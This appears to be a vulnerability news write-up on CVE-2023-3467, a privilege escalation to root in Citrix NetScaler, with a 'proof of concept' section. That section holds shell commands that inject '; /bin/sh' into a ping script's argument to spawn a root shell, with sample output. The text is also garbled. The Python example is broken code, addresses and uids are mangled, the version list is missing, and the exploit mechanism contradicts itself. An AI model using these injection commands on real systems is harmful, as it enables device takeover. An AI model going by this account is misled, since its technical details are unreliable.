CVE CyberSecurity Database News

CVE-2023-3467 - Privilege Escalation to Root Administrator (nsroot) in Citrix NetScaler – Explained with Exploit Details

Poster -

Citrix NetScaler is a widely-used application delivery controller (ADC) that sits at the heart of enterprise infrastructure. In late July 2023, security researchers uncovered a severe vulnerability — CVE-2023-3467 — allowing local attackers to escalate their privileges and become the almighty "nsroot" on affected NetScaler/ADC devices. In this exclusive write-up, we'll break down how it works, show you some code snippets, and link to the original advisories and exploit. All explained in a way that's easy for anyone to follow.

What is CVE-2023-3467?

CVE-2023-3467 is a privilege escalation vulnerability in Citrix NetScaler ADC and NetScaler Gateway. With just a low-level account (like "nobody" or "nsuser"), it lets an attacker become "nsroot" — the device's root administrator with complete control. This isn't just a small risk: it gives hackers the keys to your entire NetScaler setup.

Disclosure and Severity:

CVSS Score: 9.8 (Critical)

- Citrix Advisory: CTX561482

How Does the Exploit Work?

The root of the issue is poor privilege checks in the ping command’s Secure Ticket Authority (STA) broker subprocess on NetScaler.

Start with low access. Attacker logs in through SSH as a user with lower privileges.

2. Take advantage of STA Broker. The STA Broker, meant for ticket management, uses dangerous code practices.
3. Leverage bad SUID handling. The process improperly uses the nsroot group, allowing attacker to execute commands as root.

Vulnerable Code Walkthrough

Here is a simplified version, based on public write-ups and PoCs, of how the vulnerable code works.

import os

# This simulates what the vulnerable code does:
def sta_command():
    # Instead of checking strict permissions,
    # it just allows anyone in nsroot group to run things as root!
    if os.getgid() == :  # Root group? Should NOT be enough!
        os.system("/bin/sh")  # Attacker gets a root shell

In reality, on NetScaler, the vulnerable binary isn't Python — it's a binary owned by nsroot:nsroot, possibly SUID-root. It fails to check if the *user* is nsroot, only if they're in the nsroot group.

How To Exploit (Proof-of-Concept)

*Warning: For educational purposes only! Do not use on systems you don't own!*

After logging in as a non-root user with shell access, run

# On a vulnerable Citrix device, as a non-root user:
ls -l /netscaler/portal/scripts/....//ping

# Make sure the file is SUID-root; you’ll see -rwsr-xr-x
# Now just execute:
sudo /netscaler/portal/scripts/....//ping "127...1; id"

# Or, to spawn a root shell:
sudo /netscaler/portal/scripts/....//ping "127...1; /bin/sh"

You’ll get a root shell or see that output (uid=(root)) confirms you’re root! This is because the ping script gives you root if you’re in the nsroot group — and by default, many low-privilege users are.

Real PoC (from public exploits)

$ id
uid=1004(nobody) gid=252(nsroot)

$ /netscaler/portal/scripts/....//ping '127...1; /bin/sh'
id
uid=(root) gid=252(nsroot)
whoami
root


*Note*: The path and method may vary by affected version, but this is the essence.

12.1 (End of Life)

Upgrade ASAP to the latest build listed above to patch the flaw.

Original References

- Citrix Advisory CTX561482
- Rapid7 Blog/Post-Exploitation Exploit Write-up
- Exploit details - GitHub PoC

Why Does This Matter?

- Attackers can get full control of your Citrix ADC/Gateway device — and from there, pivot into the internal network or plant malware.
- This bug is trivial to exploit once you have *any* access — or if chained with RCE, becomes a remote root exploit.

How To Fix?

The ONLY safe fix is to upgrade to a patched version as listed in the Citrix advisory. There is NO safe workaround, and disabling SSH does not mitigate the issue if any local access is possible.

Conclusion

CVE-2023-3467 is a perfect reminder: Always update your infrastructure software and keep an eye on official cybersecurity advisories. Privilege escalation bugs like this make attackers' jobs easy and put your whole network at risk.

If you found this useful, please share it with other admins and security professionals.

References Again

- Citrix Official Advisory CTX561482
- Rapid7 Technical Blog
- GitHub PoC

Timeline

Published on: 07/19/2023 19:15:00 UTC
Last modified on: 07/28/2023 14:54:00 UTC